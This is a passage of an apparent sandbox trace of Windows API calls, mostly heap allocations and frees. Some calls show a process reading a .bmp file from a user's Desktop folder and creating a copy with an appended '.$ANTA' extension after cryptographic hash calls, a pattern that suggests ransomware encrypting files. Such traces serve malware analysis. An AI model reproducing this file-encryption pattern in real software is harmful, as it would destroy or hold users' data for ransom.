CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796fc8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0129.450] CryptDestroyHash (hHash=0x41ac140) returned 1 [0129.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb288 | out: hHeap=0x1780000) returned 1 [0129.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0129.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb270 | out: hHeap=0x1780000) returned 1 [0129.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0129.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0129.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0129.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0129.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0129.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0129.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0129.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0129.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0129.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0129.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0129.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0129.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0129.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0129.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1c8 | out: hHeap=0x1780000) returned 1 [0129.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0129.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1e0 | out: hHeap=0x1780000) returned 1 [0129.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb120 | out: hHeap=0x1780000) returned 1 [0129.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0129.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e99c8 | out: hHeap=0x1780000) returned 1 [0129.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0129.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0129.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0129.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0129.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0129.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0129.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0129.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0129.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0129.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0129.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0129.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0129.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0129.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0129.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0129.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0129.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0129.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0129.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0129.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0129.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0129.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0129.452] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0129.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0129.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0129.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0129.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0129.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0129.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0129.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0129.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0129.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0129.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0129.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0129.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0129.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0129.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb258 | out: hHeap=0x1780000) returned 1 [0129.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb378 | out: hHeap=0x1780000) returned 1 [0129.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0129.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9128 | out: hHeap=0x1780000) returned 1 [0129.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0129.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0129.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0129.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0129.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0129.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0129.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0129.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0129.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0129.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0129.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0129.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0129.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0129.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0129.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0129.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0129.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0129.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0129.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0129.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0129.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0129.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0129.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0129.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0129.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0129.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0129.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0129.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0129.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0129.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0129.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0129.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0129.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0129.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0129.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0129.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0129.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0129.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0129.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0129.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0129.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0129.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0129.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0129.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0129.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0129.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0129.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0129.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0129.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0129.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0129.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0129.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0129.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0129.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0129.455] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0129.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0129.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0129.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0129.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41abfc0 | out: hHeap=0x1780000) returned 1 [0129.455] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0129.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0129.455] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0129.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0129.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0129.455] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\1aQmLq17nlG1P.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\1aqmlq17nlg1p.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0129.456] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.456] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0129.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0129.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0129.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0129.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0129.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0129.456] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0129.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0129.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0129.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0129.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0129.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0129.457] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0129.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0129.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0129.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0129.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0129.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0129.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0129.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0129.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a4e98 | out: hHeap=0x1780000) returned 1 [0129.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0129.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0129.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0129.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392030 | out: hHeap=0x1780000) returned 1 [0129.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0129.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a3f8 | out: hHeap=0x1780000) returned 1 [0129.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0129.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0129.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0129.457] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9")) returned 0x10 [0129.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a558 | out: hHeap=0x1780000) returned 1 [0129.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0129.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a608 | out: hHeap=0x1780000) returned 1 [0129.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0129.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0129.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0129.458] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\1aQmLq17nlG1P.bmp.$ANTA" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\1aqmlq17nlg1p.bmp.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0129.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0129.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0129.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0129.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0129.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0129.458] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0129.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0129.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0129.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0129.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0129.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac180 | out: hHeap=0x1780000) returned 1 [0129.459] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0129.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0129.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0129.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0129.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0129.462] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0129.462] ReadFile (in: hFile=0x2a0, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ecd0*=0x7203, lpOverlapped=0x0) returned 1 [0129.464] ReadFile (in: hFile=0x2a0, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0129.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0129.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0129.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0129.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0129.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x7203) returned 0x49aa010 [0129.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1b88020 | out: hHeap=0x1780000) returned 1 [0129.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0129.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0129.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0129.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0129.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0129.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x7203) returned 0x49b1220 [0129.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0129.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0129.543] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0129.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0129.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0129.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0129.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0129.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0129.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x7203) returned 0x49aa010 [0129.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0129.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0129.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0129.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0129.544] HeapFree (in: 